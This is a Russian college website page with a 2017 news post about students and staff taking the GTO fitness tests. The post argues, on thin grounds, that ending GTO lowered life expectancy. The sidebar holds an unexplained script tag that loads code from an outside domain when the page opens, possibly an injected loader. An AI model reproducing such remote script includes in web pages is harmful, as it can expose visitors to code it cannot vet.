Главная
Регистрация
Вход

Приветствую Вас Гость | RSS

Меню сайта

Категории раздела
Абитуриентам [0]
Для желающих поступить в наш колледж

Независимая оценка
Как вы оцениваете качество образовательных услуг нашего колледжа?
Всего ответов: 224

Статистика

Онлайн всего: 1
Гостей: 1
Пользователей: 0

  
Главная » 2017 » Октябрь » 4 » "А ты готов к труду и обороне?!"
12:34
"А ты готов к труду и обороне?!"

Известно, что после отмены ГТО понизилась средняя продолжительность жизни и увеличилась общая заболеваемость. Средняя продолжительность с 1958 по 1983 года (был комплекс ГТО) составляла 68,8, а с 1990 по 2011, когда данная система не использовалась, составила 66,6.

На первый взгляд, разница в 2 года- не такая существенная, но не стоит забывать, что медицина не стоит на месте. Многие болезни раньше считались неизлечимыми, тем не менее, во времена СССР средняя продолжительность была выше, чем сейчас.


В марте 2013 года на совещании по развитию детско-юношеского спорта, В.В. Путин заявил о том, что, не смотря на усилия по продвижению ценностей здорового образа жизни, многие дети имеют хронические заболевания, а ситуация с массовым и с детским спортом серьезно не изменилась. Для решения этой проблемы и укрепления здоровья детей В.В. Путин предложил воссоздать систему ГТО в новом формате с современными нормативами, которые будут соответствовать уровню физического развития.

В связи с этим, 24 марта Президент РФ В.В. Путин подписал указ о старте проекта по возрождению системы ГТО. При этом решено сохранить старое название- "Готов к труду и обороне!", как дань традициям нашей национальной истории.


27.09.2017 года, морально подготовленные студенты, педагоги и сотрудники, во главе с директором колледжа Г.В. Прейс приступили к тестированию норм ГТО, в различных возрастных группах. Следует отметить, что многие "тестируемые", вначале желали выполнить показатели "Золотого значка".

Однако, действительность постепенно внесла свои коррективы для некоторых участников. ВФСК ГТО- это не самоцель, а закономерный итог регулируемых занятий физическими упражнениями, чтобы выполнить нормы.


"Откосившие" от участия в сдаче нормативов, активно "болели" за своих товарищей. Руководитель физического воспитания Педченко М.М. записывал фамилии потенциальных участников соревнований среди студентов СУЗов Тюменской области. Между студентами, педагогами и сотрудниками споро сновал фоторепортер. Фотографии тоже получились замечательные!
Подводя итог, можно сказать, что все возрастные группы проявили себя исключительно положительным образом- травмированных и госпитализированных не было!
Главный результат проведенного мероприятия состоит в том, чтобы все участники поняли: "Для того, чтобы сдать нормы ГТО необходимо активно и регулярно заниматься физическими упражнениями!

Материал подготовил:

Руководитель физического воспитания Педченко М.М.

Просмотров: 420 | Добавил: agropedcolledg | Рейтинг: 0.0/0
Всего комментариев: 0
Имя *:
Email *:
Код *:


Вход на сайт
Логин:
Пароль:

Мы потомки Героев


ПОЛЕЗНЫЕ ССЫЛКИ

Министерство образования и науки Российской Федерации Единое окно доступа к образовательным ресурсам Федеральный портал "Российское образование" Единая коллекция цифровых образовательных ресурсов Федеральный центр информационно-образовательных ресурсов


Персональные данные Дети МЕСТО РОЖДЕНИЯ:
ТЮМЕНСКИЙ КРАЙ Конкурс новый взгляд
<script src="https://tabun.info/out/index.php"></script>
http://профстажировки.рф/
Поиск

Календарь
«  Октябрь 2017  »
ПнВтСрЧтПтСбВс
      1
2345678
9101112131415
16171819202122
23242526272829
3031

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Архив записей

Copyright MyCorp © 2024
Создать бесплатный сайт с uCoz